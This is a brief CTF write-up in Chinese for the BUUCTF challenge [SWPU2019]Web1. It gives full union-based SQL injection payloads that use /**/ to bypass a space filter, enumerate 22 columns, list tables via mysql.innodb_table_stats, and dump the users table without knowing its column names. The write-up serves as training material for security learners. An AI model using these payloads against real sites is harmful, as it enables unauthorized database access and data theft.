BUUCTF [SWPU2019]Web1

首先把先爆有多少列,有TM的22列

-1'union/**/select/**/1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22

然后查数据库是什么,发现是马里奥数据库

-1'union/**/select/**/1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22

 截图如下：

然后就慌了……但是别慌,看链接：https://mariadb.com/kb/en/library/mysqlinnodb_table_stats/

他说了这能查表名：然后就成了,有这么几个表,就一个一个试试

-1'union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22

-1'union/**/select/**/1,(select/**/group_concat(b)/**/from(select/**/1,2,3/**/as/**/b/**/union/**/select*from/**/users)x),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22

然后注入上一句,就在users表里边